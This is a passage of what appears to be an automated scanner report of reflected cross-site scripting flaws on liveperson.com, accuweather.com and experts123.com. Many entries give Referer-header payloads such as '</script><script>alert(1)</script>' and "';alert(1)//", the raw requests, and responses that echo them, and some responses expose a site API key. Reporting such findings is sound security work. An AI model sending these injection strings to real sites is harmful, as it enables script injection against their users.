Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:47:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Dc0c7f%27%2Dalert%281%29%2D%27d23b91857f7; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=LLOJGOICFHNPLMCFLGEAMHAL; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5bc</script><script>alert(1)</script>da526c0c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index-radar.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2
Response (redirected)
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Length: 64616
Content-Type: text/html
Cache-Control: public
Date: Thu, 03 Feb 2011 16:35:04 GMT
Connection: close
Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea ...[SNIP]... <script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea202</script><script>alert(1)</script>53080030620 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /maps-satellite.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620
Response (redirected)
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Length: 64040
Content-Type: text/html
Cache-Control: public
Date: Thu, 03 Feb 2011 16:35:14 GMT
Connection: close
Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80de'%3balert(1)//2bbe976dfa9 was submitted in the Referer HTTP header. This input was echoed as d80de';alert(1)//2bbe976dfa9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d80de'%3balert(1)//2bbe976dfa9
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2434"%3balert(1)//40b9502e47 was submitted in the Referer HTTP header. This input was echoed as e2434";alert(1)//40b9502e47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e2434"%3balert(1)//40b9502e47
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "e2434";alert(1)//40b9502e47"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58da2'%3balert(1)//bbd7524fdca was submitted in the Referer HTTP header. This input was echoed as 58da2';alert(1)//bbd7524fdca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58da2'%3balert(1)//bbd7524fdca
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:17 GMT
Connection: close
Content-Length: 30482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcd6c"%3balert(1)//f1f27091f7b was submitted in the Referer HTTP header. This input was echoed as bcd6c";alert(1)//f1f27091f7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bcd6c"%3balert(1)//f1f27091f7b
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 30482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "bcd6c";alert(1)//f1f27091f7b"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f3f"%3balert(1)//41fc69da3be was submitted in the Referer HTTP header. This input was echoed as 25f3f";alert(1)//41fc69da3be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=25f3f"%3balert(1)//41fc69da3be
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "25f3f";alert(1)//41fc69da3be"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc6b'%3balert(1)//1fcabebdc24 was submitted in the Referer HTTP header. This input was echoed as fdc6b';alert(1)//1fcabebdc24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fdc6b'%3balert(1)//1fcabebdc24
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc8e'%3balert(1)//6bb3a5f1c5f was submitted in the Referer HTTP header. This input was echoed as ccc8e';alert(1)//6bb3a5f1c5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ccc8e'%3balert(1)//6bb3a5f1c5f
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1947f"%3balert(1)//760c35e1ead was submitted in the Referer HTTP header. This input was echoed as 1947f";alert(1)//760c35e1ead in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1947f"%3balert(1)//760c35e1ead
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "1947f";alert(1)//760c35e1ead"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a50b1'%3balert(1)//6a7613daa75 was submitted in the Referer HTTP header. This input was echoed as a50b1';alert(1)//6a7613daa75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a50b1'%3balert(1)//6a7613daa75
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5395"%3balert(1)//8cf555a3bfa was submitted in the Referer HTTP header. This input was echoed as d5395";alert(1)//8cf555a3bfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d5395"%3balert(1)//8cf555a3bfa
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d5395";alert(1)//8cf555a3bfa"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a44e'%3balert(1)//5f700a46bff was submitted in the Referer HTTP header. This input was echoed as 1a44e';alert(1)//5f700a46bff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1a44e'%3balert(1)//5f700a46bff
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:57 GMT
Connection: close
Content-Length: 34659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacf1"%3balert(1)//155dee88ae4 was submitted in the Referer HTTP header. This input was echoed as dacf1";alert(1)//155dee88ae4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dacf1"%3balert(1)//155dee88ae4
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:56 GMT
Connection: close
Content-Length: 34659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "dacf1";alert(1)//155dee88ae4"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2ffb'%3balert(1)//2017b493094 was submitted in the Referer HTTP header. This input was echoed as c2ffb';alert(1)//2017b493094 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
